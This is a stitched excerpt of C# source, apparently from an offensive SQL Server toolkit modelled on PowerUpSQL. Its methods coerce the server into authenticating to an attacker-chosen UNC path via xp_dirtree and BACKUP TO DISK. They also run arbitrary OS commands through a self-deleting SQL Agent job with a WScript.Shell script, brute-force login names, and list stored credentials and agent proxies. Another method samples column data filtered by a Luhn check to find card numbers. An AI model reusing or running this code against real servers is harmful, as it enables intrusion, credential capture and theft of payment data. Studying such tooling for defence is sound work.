                        // NOTE(review): the database name [TESTING] is hard-coded, so
                        // these statements fail unless such a database exists — confirm intended.
                        query1 = string.Format("BACKUP LOG [TESTING] TO DISK = \'{0}\'", uncpath);
                        query2 = string.Format("BACKUP DATABASE [TESTING] TO DISK = \'{0}\'", uncpath);
                    }
                    else
                    {
                        query1 = string.Format("xp_dirtree \'{0}\'", uncpath);
                        query2 = string.Format("xp_fileexist \'{0}\'", uncpath);
                    }

                    // Order is deliberate: query1 is always sent before query2.
                    _Query(sql, query1);
                    _Query(sql, query2);
                }
            }
            return(true);
        }
Пример #20
        /// <summary>
        /// Runs <c>QUERY1_2</c> with the identifying columns in front and the optional
        /// audit-name, audit-specification and audit-action-name filters appended,
        /// storing the typed rows in <c>databaseSpecifications</c>.
        /// </summary>
        /// <returns>false when the connection fails; true otherwise.</returns>
        internal override bool Query()
        {
            string header = string.Format(
                "SELECT  \'{0}\' as [ComputerName],\n" +
                "\'{1}\' as [Instance],",
                computerName, instance
                );

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }
                // string.Concat treats null as empty, which matches the IsNullOrEmpty
                // guards the previous StringBuilder version placed around each filter.
                string statement = string.Concat(
                    header,
                    QUERY1_2,
                    auditNameFilter,
                    auditSpecificationFilter,
                    auditActionNameFilter);
#if DEBUG
                Console.WriteLine(statement);
#endif
                databaseSpecifications = sql.Query <DatabaseSpecification>(statement, new DatabaseSpecification());
            }
            return(true);
        }
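        /// <summary>
        /// Runs an OS command on the SQL Server host through a SQL Agent job whose single
        /// step uses the ActiveScripting subsystem (VBScript or JScript). The job is defined
        /// here and completed by QUERY1_2, started by QUERY2_1 and torn down by QUERY3_1;
        /// each step's "output" column is echoed to the console.
        /// </summary>
        /// <param name="query">The OS command line to execute on the remote host.</param>
        internal void Query(string query)
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return;
                }

                if (!_Check(sql))
                {
                    return;
                }

                string command     = string.Empty;
                string dbSubSystem = string.Empty;

                if (string.Equals(subsystem, "vbscript", StringComparison.OrdinalIgnoreCase))
                {
                    // VBScript string literals are double-quoted; an embedded quote is written as "".
                    string vbsCommand = query.Replace("\"", "\"\"");
                    command =
                        "Function Main()\n" +
                        "dim shell\n" +
                        "set shell = CreateObject(\"WScript.Shell\")\n" +
                        "shell.run(\"" + vbsCommand + "\")\n" +
                        "set shell = nothing\n" +
                        "END Function";
                    dbSubSystem = "N\'VBScript\',";
                }
                else if (string.Equals(subsystem, "jscript", StringComparison.OrdinalIgnoreCase))
                {
                    // The script is concatenated rather than built with string.Format: the
                    // previous version passed the JScript braces "{" / "}" to string.Format
                    // unescaped, which throws FormatException before anything is sent.
                    // JScript literals treat backslash as an escape, so a path like C:\Temp would
                    // lose its separators; escape backslashes first, then embedded quotes.
                    string jsCommand = query.Replace("\\", "\\\\").Replace("\"", "\\\"");
                    command =
                        "function RunCmd()\n" +
                        "{\n" +
                        "var WshShell = new ActiveXObject(\"WScript.Shell\");\n" +
                        "var oExec = WshShell.Exec(\"" + jsCommand + "\");\n" +
                        "oExec = null;\n" +
                        "WshShell = null;\n" +
                        "}\n" +
                        "RunCmd();";
                    dbSubSystem = "N\'JavaScript\',";
                }
                else
                {
                    // Unknown subsystem: nothing is created on the server.
                    return;
                }

                // The whole script is embedded in an N'...' T-SQL literal, so single quotes
                // must be doubled (the templates themselves contain none).
                command = command.Replace("\'", "\'\'");

                string jobDefinition =
                    "USE msdb;\n" +
                    "EXECUTE dbo.sp_add_job\n" +
                    "@job_name = N\'powerupsql_job\'\n" +

                    "EXECUTE sp_add_jobstep\n" +
                    "@job_name = N\'powerupsql_job\',\n" +
                    "@step_name = N\'powerupsql_job_step\',\n" +
                    "@subsystem = N'ActiveScripting',\n" +
                    "@command = N\'" + command + "\',\n";

                // Order matters: the script-language value (dbSubSystem) is appended directly
                // after @command and QUERY1_2 is expected to complete that parameter list.
                StringBuilder sb = new StringBuilder();
                sb.Append(jobDefinition);
                sb.Append(dbSubSystem);
                sb.Append(QUERY1_2);
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));

                // Start the job.
                sb.Clear();
                sb.Append(QUERY2_1);
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                Console.WriteLine(App.DELIMITER);
                Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
                Console.WriteLine(App.DELIMITER);

                // Clean up the job so the artefact does not linger on the target.
                sb.Clear();
                sb.Append(QUERY3_1);
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
            }
        }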
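        /// <summary>
        /// Enumerates SQL Agent jobs (QUERY2_1 plus the optional keyword / subsystem /
        /// proxy-credential filters) on <c>instance</c> and maps each row into
        /// <c>serverJobs</c>.
        /// </summary>
        /// <returns>false on connection failure, an empty result, or a row that could not be
        /// mapped; true once every row has been mapped.</returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                if (!_Check(sql))
                {
                    return(false);
                }

                StringBuilder sb = new StringBuilder();
                sb.Append(QUERY2_1);
                // Filters are operator-supplied raw SQL fragments, appended verbatim in this order.
                string[] filters = { keywordFilter, subsystemFilter, proxyCredFilter, usingProxyCredFilter };
                foreach (string filter in filters)
                {
                    if (!string.IsNullOrEmpty(filter))
                    {
                        sb.Append(filter);
                    }
                }
                table = sql.Query(sb.ToString());
            }

            // The foreach header below sits outside the try, so a null table (which the
            // "Empty Response" handling elsewhere in this file is written for) used to escape
            // as an unhandled ArgumentNullException from AsEnumerable(). Report it instead.
            if (table == null)
            {
                Console.WriteLine("Empty Response");
                return(false);
            }

            foreach (DataRow row in table.AsEnumerable())
            {
                try
                {
                    ServerJob sj = new ServerJob
                    {
                        ComputerName     = computerName,
                        Instance         = instance,
                        DatabaseName     = database,
                        Job_Id           = (int)row["Job_Id"],
                        Job_Name         = (string)row["Job_Name"],
                        Job_Description  = (string)row["Job_Description"],
                        Job_Owner        = (string)row["Job_Owner"],
                        Proxy_Id         = (int)row["Proxy_Id"],
                        Proxy_Credential = (string)row["Proxy_Credential"],
                        Date_Created     = (string)row["Date_Created"],
                        Last_Run_Date    = (DateTime)row["Last_Run_Date"],
                        Enabled          = (bool)row["Enabled"],
                        Server           = (string)row["Server"],
                        Step_Name        = (string)row["Step_Name"],
                        SubSystem        = (string)row["SubSystem"],
                        Command          = (string)row["Command"]
                    };
#if DEBUG
                    Misc.PrintStruct <ServerJob>(sj);
#endif
                    serverJobs.Add(sj);
                }
                catch (ArgumentNullException)
                {
                    Console.WriteLine("Empty Response");
                    return(false);
                }
                catch (Exception ex)
                {
                    // Typically an InvalidCastException when a column holds DBNull or an
                    // unexpected type; the first bad row aborts the whole mapping.
                    Console.WriteLine(ex.Message);
                    return(false);
                }
            }
            return(true);
        }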
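        /// <summary>
        /// Enumerates server-level credential entries on <c>instance</c> (QUERY1_2, run in
        /// master, optionally narrowed by <c>credentialFilter</c>) into
        /// <c>serverCredentials</c>.
        /// </summary>
        /// <returns>false when the connection could not be opened; true once the query has run.</returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                // The previous version also ran SQLSysadminCheck.Query here but never used the
                // answer; that extra round-trip has been dropped.
                StringBuilder sb = new StringBuilder();
                sb.Append(string.Format("USE master;\nSELECT  \'{0}\' as [ComputerName],\n\'{1}\' as [Instance],", computerName, instance));
                sb.Append(QUERY1_2);
                if (!string.IsNullOrEmpty(credentialFilter))
                {
                    // Operator-supplied raw SQL fragment, appended verbatim.
                    sb.Append(credentialFilter);
                }
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                serverCredentials = sql.Query <ServerCredential>(sb.ToString(), new ServerCredential());
            }

            // Consistent with the other enumerators in this file: a completed query reports
            // success. The old unconditional "return false" made callers treat every run,
            // including successful ones, as a failure.
            return(true);
        }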
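        /// <summary>
        /// Brute-forces server principal ids 1..<c>end</c> by resolving each with
        /// SUSER_NAME(), then classifies every resolved name (Windows account, SQL login or
        /// server role) from the error that sp_defaultdb returns for a non-existent database.
        /// Results are stored in <c>fuzzed</c>.
        /// </summary>
        /// <returns>false on connection failure or when a row could not be mapped; otherwise true.</returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                // row_number() over a spt_values cross join generates the candidate id range;
                // {2} ("end") is the number of ids to probe.
                string enumerateQuery = string.Format(
                    "SELECT \'{0}\' as [ComputerName],\n" +
                    "\'{1}\' as [Instance],\n" +
                    "n as [PrincipalId],\n" +
                    "SUSER_NAME(n) as [PrincipleName]\n" +
                    "FROM(\n" +
                    "SELECT top {2} row_number() over(order by t1.number) as N\n" +
                    "FROM master..spt_values t1\n" +
                    "       cross join master..spt_values t2\n" +
                    ") a\n" +
                    "WHERE SUSER_NAME(n) is not null",
                    computerName, instance, end
                    );
#if DEBUG
                Console.WriteLine(enumerateQuery);
#endif
                foreach (var row in sql.Query(enumerateQuery).AsEnumerable())
                {
                    try
                    {
                        Fuzz f = new Fuzz
                        {
                            ComputerName = computerName,
                            Instance     = instance,
                            // row_number() yields bigint, hence the long cast.
                            PrincipalId  = (long)row["PrincipalId"],
                        };

                        if (row["PrincipleName"] is DBNull)
                        {
                            continue;
                        }
                        f.PrincipleName = (string)row["PrincipleName"];
                        f.PrincipalType = string.Empty;
                        fuzzed.Add(f);
                    }
                    catch (ArgumentNullException)
                    {
                        continue;
                    }
                    catch (Exception ex)
                    {
                        Console.WriteLine(ex.Message);
                        return(false);
                    }
                }

                // Work on an array so element fields can be assigned in place (Fuzz is used
                // with Misc.PrintStruct elsewhere and may be a value type).
                Fuzz[] arrFuzz = fuzzed.ToArray();
                for (int i = 0; i < arrFuzz.Length; i++)
                {
                    // Principal names come back from the server and may legitimately contain a
                    // single quote (e.g. DOMAIN\O'Brien). Doubling it keeps the T-SQL literal
                    // intact, so such logins are not misreported as roles because of a syntax error.
                    string principalName = arrFuzz[i].PrincipleName.Replace("\'", "\'\'");
                    string probeQuery = string.Format("EXEC master..sp_defaultdb \'{0}\', \'NOTAREALDATABASE1234ABCD\'", principalName);
                    try
                    {
                        // The database does not exist, so the call is expected to fail; only the
                        // error text is of interest. Both command and reader are disposed.
                        using (SqlCommand cmd = new SqlCommand(probeQuery, sql.GetSQL()))
                        using (SqlDataReader reader = cmd.ExecuteReader())
                        {
                        }
                    }
                    catch (SqlException ex)
                    {
                        // The server only gets as far as complaining about the bogus database (or
                        // about altering the login) when the name is a login; any other error is
                        // taken to mean the name is a server role.
                        if (ex.Message.Contains("NOTAREALDATABASE") || ex.Message.Contains("alter the login"))
                        {
                            arrFuzz[i].PrincipalType = arrFuzz[i].PrincipleName.Contains(@"\")
                                ? "Windows Account"
                                : "SQL Login";
                        }
                        else
                        {
                            arrFuzz[i].PrincipalType = "SQL Server Role";
                        }
                    }
                    catch (Exception ex)
                    {
                        Console.WriteLine(ex);
                    }
                }
                fuzzed = arrFuzz.ToList();
            }
            return(true);
        }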
        /// <summary>
        /// Lists the schemas of <c>database</c> (INFORMATION_SCHEMA.SCHEMATA) on <c>instance</c>
        /// into <c>schemas</c>, optionally narrowed by <c>schemaFilter</c>.
        /// </summary>
        /// <returns>false if the connection cannot be opened, otherwise true.</returns>
        internal override bool Query()
        {
            // Literal ComputerName/Instance columns tag every row with its origin. The
            // operator-supplied database name is spliced straight into USE and FROM.
            string selectHead = string.Format(
                "USE {0};\n" +
                "SELECT  \'{1}\' as [ComputerName],\n" +
                "\'{2}\' as [Instance],",
                database, computerName, instance
                );

            string fromClause = string.Format(
                "FROM [{0}].[INFORMATION_SCHEMA].[SCHEMATA]",
                database
                );

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                StringBuilder statement = new StringBuilder();
                statement.Append(selectHead).Append(QUERY1_2).Append(fromClause);
                if (!string.IsNullOrEmpty(schemaFilter))
                {
                    statement.Append(schemaFilter);
                }
                statement.Append(QUERY1_4);
#if DEBUG
                Console.WriteLine(statement.ToString());
#endif
                schemas = sql.Query <Schema>(statement.ToString(), new Schema());
            }
            return(true);
        }
        /// <summary>
        /// Enumerates the database roles of <c>database</c> (sys.database_principals with
        /// type 'R') on <c>instance</c> into <c>databaseRoles</c>, optionally narrowed by
        /// <c>rolePrincipalNameFilter</c> and <c>roleOwnerFilter</c>.
        /// </summary>
        /// <returns>false if the connection cannot be opened, otherwise true.</returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                // Origin columns; the operator-supplied database name is spliced in as-is.
                string selectHead = string.Format(
                    "USE {0};\n" +
                    "SELECT  \'{1}\' as [ComputerName],\n" +
                    "\'{2}\' as [Instance],\n" +
                    "\'{0}\' as [DatabaseName],",
                    database, computerName, instance);

                // type 'R' restricts sys.database_principals to database roles.
                string fromClause = string.Format(
                    "FROM [{0}].[sys].[database_principals]\n" +
                    "WHERE type like \'R\'",
                    database);

                StringBuilder statement = new StringBuilder();
                statement.Append(selectHead).Append(QUERY1_2).Append(fromClause);

                // Optional raw-SQL filters, appended verbatim in this order when present.
                string[] filters = { rolePrincipalNameFilter, roleOwnerFilter };
                foreach (string filter in filters)
                {
                    if (!string.IsNullOrEmpty(filter))
                    {
                        statement.Append(filter);
                    }
                }
#if DEBUG
                Console.WriteLine(statement.ToString());
#endif
                databaseRoles = sql.Query <DatabaseRole>(statement.ToString(), new DatabaseRole());
            }
            return(true);
        }
        /// <summary>
        /// Enumerates DDL triggers on <c>instance</c> (QUERY1_2, optionally narrowed by
        /// <c>triggerNameFilter</c>) into <c>triggers</c>.
        /// </summary>
        /// <returns>false if the connection cannot be opened, otherwise true.</returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                // Origin columns prepended to the fixed SELECT body in QUERY1_2.
                string selectHead = string.Format(
                    "SELECT  \'{0}\' as [ComputerName],\n" +
                    "\'{1}\' as [Instance],",
                    computerName, instance);

                StringBuilder statement = new StringBuilder(selectHead);
                statement.Append(QUERY1_2);
                if (!string.IsNullOrEmpty(triggerNameFilter))
                {
                    // Operator-supplied raw SQL fragment, appended verbatim.
                    statement.Append(triggerNameFilter);
                }

#if DEBUG
                Console.WriteLine(statement.ToString());
#endif
                triggers = sql.Query <TriggerDdl>(statement.ToString(), new TriggerDdl());
            }
            return(true);
        }
        /// <summary>
        /// Enumerates CLR assembly files into <c>files</c>. With <c>showAll</c> the fixed
        /// QUERY2_1 is run as-is; otherwise the statement is assembled for <c>database</c>
        /// and optionally narrowed by <c>assemblyNameFilter</c>.
        /// </summary>
        /// <returns>false if the connection cannot be opened, otherwise true.</returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                // NOTE(review): the per-database branch selects FROM [sys].[triggers] although
                // the rows are mapped to AssemblyFiles; this looks copied from the trigger
                // enumerator. Confirm against QUERY1_2 whether sys.assembly_files was intended.
                string useClause  = string.Format("USE {0};", database);
                string fromClause = string.Format(
                    "FROM [{0}].[sys].[triggers] WHERE 1=1",
                    database);

                StringBuilder statement = new StringBuilder();
                if (showAll)
                {
                    statement.Append(QUERY2_1);
                }
                else
                {
                    statement.Append(useClause).Append(QUERY1_2).Append(fromClause);
                    if (!string.IsNullOrEmpty(assemblyNameFilter))
                    {
                        // Operator-supplied raw SQL fragment, appended verbatim.
                        statement.Append(assemblyNameFilter);
                    }
                }

#if DEBUG
                Console.WriteLine(statement.ToString());
#endif
                files = sql.Query <AssemblyFiles>(statement.ToString(), new AssemblyFiles());
            }
            return(true);
        }
        /// <summary>
        /// Pulls up to <c>sampleSize</c> non-null values from every column found by the base
        /// column search and records them in <c>results</c>. When <c>checkLuhn</c> is set,
        /// string values that fail <c>Misc.CheckLuhn</c> are skipped.
        /// </summary>
        /// <returns>false if the base search or the connection fails, otherwise true.</returns>
        internal override bool Query()
        {
            if (!base.Query())
            {
                return(false);
            }

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                foreach (var column in base.columns)
                {
                    // Identifiers come from the base class's catalog search and are spliced in
                    // as-is; only the column name is bracket-quoted.
                    string sampleQuery = string.Format(
                        "USE {0}; SELECT TOP {1} [{2}] FROM {3} WHERE [{2}] is not null",
                        column.DatabaseName, sampleSize, column.ColumnName, column.TableName);
#if DEBUG
                    Console.WriteLine(sampleQuery);
#endif
                    DataTable rows = sql.Query(sampleQuery);
                    try
                    {
                        foreach (DataRow row in rows.AsEnumerable())
                        {
                            if (string.IsNullOrEmpty(column.ColumnName))
                            {
                                continue;
                            }

                            object value = row[column.ColumnName];
                            string text = value as string;
                            if (checkLuhn && text != null && !Misc.CheckLuhn(text))
                            {
                                continue;
                            }

                            results.Add(new SampleData
                            {
                                Instance     = instance,
                                DatabaseName = column.DatabaseName,
                                TableName    = column.TableName,
                                ColumnName   = column.ColumnName,
                                ColumnData   = value
                            });
                        }
                    }
                    catch (ArgumentNullException)
                    {
                        // If sql.Query returned null, AsEnumerable() throws and lands here.
                        Console.WriteLine("Empty Response");
                    }
                    catch (Exception ex)
                    {
                        // A failed lookup or cast on one column only skips that column.
                        Console.WriteLine(ex.Message);
                    }
                }
            }
            return(true);
        }
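        /// <summary>
        /// Collects server and OS details for <c>instance</c> into <c>details</c>. When the
        /// caller is sysadmin, the extra fragments query1_2 / query1_5 are included and the
        /// OsMachineType / OSVersionName columns are read as well. Only the first row is used.
        /// </summary>
        /// <returns>true when a row was mapped; false on connection failure, an empty result,
        /// or a row that could not be mapped.</returns>
        internal override bool Query()
        {
            bool isSysAdmin = false;

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                // Separate round-trip; its answer decides which optional fragments are included.
                isSysAdmin = SQLSysadminCheck.Query(instance, computerName, credentials);

                StringBuilder query = new StringBuilder(query1_1);
                if (isSysAdmin)
                {
                    query.Append(query1_2);
                }
                query.Append(string.Format("SELECT  \'{0}\' as [ComputerName],\n", computerName));
                query.Append(query1_4);
                if (isSysAdmin)
                {
                    query.Append(query1_5);
                }
                query.Append(query1_6);

                table = sql.Query(query.ToString());
            }

            // The foreach header below sits outside the try, so a null table (which the
            // "Empty Response" handling elsewhere in this file is written for) used to escape
            // as an unhandled ArgumentNullException from AsEnumerable(). Report it instead.
            if (table == null)
            {
                Console.WriteLine("Empty Response");
                return(false);
            }

            foreach (DataRow row in table.AsEnumerable())
            {
                try
                {
                    details = new Details
                    {
                        ComputerName           = (string)row["ComputerName"],
                        Instance               = (string)row["Instance"],
                        DomainName             = (string)row["DomainName"],
                        ServiceProcessID       = (int)row["ServiceProcessID"],
                        ServiceName            = (string)row["ServiceName"],
                        ServiceAccount         = (string)row["ServiceAccount"],
                        AuthenticationMode     = (string)row["AuthenticationMode"],
                        ForcedEncryption       = (int)row["ForcedEncryption"],
                        Clustered              = (string)row["Clustered"],
                        SQLServerVersionNumber = (string)row["SQLServerVersionNumber"],
                        SQLServerMajorVersion  = (string)row["SQLServerMajorVersion"],
                        SQLServerEdition       = (string)row["SQLServerEdition"],
                        SQLServerServicePack   = (string)row["SQLServerServicePack"],
                        OSArchitecture         = (string)row["OSArchitecture"],
                        OsVersionNumber        = (string)row["OsVersionNumber"],
                        Currentlogin           = (string)row["Currentlogin"]
                    };

                    // These two columns only exist in the sysadmin variant of the query.
                    if (isSysAdmin)
                    {
                        details.OsMachineType = (string)row["OsMachineType"];
                        details.OSVersionName = (string)row["OSVersionName"];
                    }
#if DEBUG
                    Misc.PrintStruct <Details>(details);
#endif
                    return(true);
                }
                catch (ArgumentNullException)
                {
                    Console.WriteLine("Empty Response");
                    return(false);
                }
                catch (Exception ex)
                {
                    // Typically an InvalidCastException when a column holds DBNull.
                    Console.WriteLine(ex.Message);
                    return(false);
                }
            }

            // Result set had no rows.
            return(false);
        }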